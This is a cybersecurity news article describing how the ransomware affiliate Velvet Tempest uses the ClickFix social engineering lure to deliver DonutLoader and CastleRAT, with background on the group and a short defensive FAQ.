Velvet Tempest’s Evolving Tactics: The Rise of ClickFix and the Threat to Organizations
A sophisticated threat actor known as Velvet Tempest (also tracked as DEV-0504) is leveraging a novel social engineering technique called ClickFix to deploy malware, including DonutLoader and CastleRAT, researchers at MalBeacon have discovered. This marks a significant evolution in ransomware deployment strategies, combining deceptive tactics with legitimate Windows utilities to evade detection.
Understanding the ClickFix Technique
ClickFix relies on tricking users into pasting obfuscated commands into the Windows Run dialog, often presented alongside a CAPTCHA. This seemingly harmless action initiates a chain of malicious processes, utilizing legitimate tools like cmd.exe and finger.exe to download and execute malware. The recent campaign observed by MalBeacon targeted a simulated U.S.-based non-profit organization with over 3,000 endpoints and 2,500 users.
Source: MalBeacon
A History of Devastating Ransomware
Velvet Tempest has been an active affiliate in the ransomware landscape for at least five years, demonstrating a willingness to partner with developers of various ransomware-as-a-service (RaaS) offerings. The group has been linked to some of the most damaging ransomware strains, including Ryuk, REvil, Conti, BlackMatter, BlackCat/ALPHV, LockBit, and RansomHub. While the observed intrusion did not result in the deployment of Termite ransomware, the infrastructure was in place for its potential use. Termite ransomware has previously impacted organizations like Blue Yonder and Genea.
Technical Details of the Attack Chain
Following initial access via ClickFix, Velvet Tempest operators engaged in reconnaissance activities, including Active Directory exploration and credential harvesting from Chrome. PowerShell scripts were used to download additional payloads, compile .NET components, and establish Python-based persistence mechanisms. The ultimate goal was to deploy DonutLoader and CastleRAT, a remote access trojan associated with data theft and control.
Source: MalBeacon
The Growing Popularity of ClickFix
The ClickFix technique is not unique to Velvet Tempest. The Interlock ransomware gang was also reported using this social engineering method in 2025, indicating a broader trend among threat actors. This suggests that ClickFix is an effective method for bypassing traditional security measures and gaining initial access to target networks.
FAQ
What is ClickFix? ClickFix is a social engineering technique that tricks users into executing malicious commands by pasting them into the Windows Run dialog.
Who is Velvet Tempest? Velvet Tempest (DEV-0504) is a ransomware affiliate group with a history of deploying various ransomware strains.
What is CastleRAT? CastleRAT is a remote access trojan used for data theft and control of compromised systems.
Is Termite ransomware always deployed by Velvet Tempest? Not necessarily. While the infrastructure for Termite was present in the observed attack, it wasn’t deployed in this instance.
What can organizations do to protect themselves? Implement robust security awareness training, focusing on identifying and avoiding social engineering tactics. Regularly update security software and monitor network traffic for suspicious activity.
Did you know? Velvet Tempest has been active for at least five years, adapting its tactics and partnering with different ransomware developers.
Stay informed about the latest threats and vulnerabilities. Explore additional resources on ransomware prevention and cybersecurity best practices to strengthen your organization’s defenses.
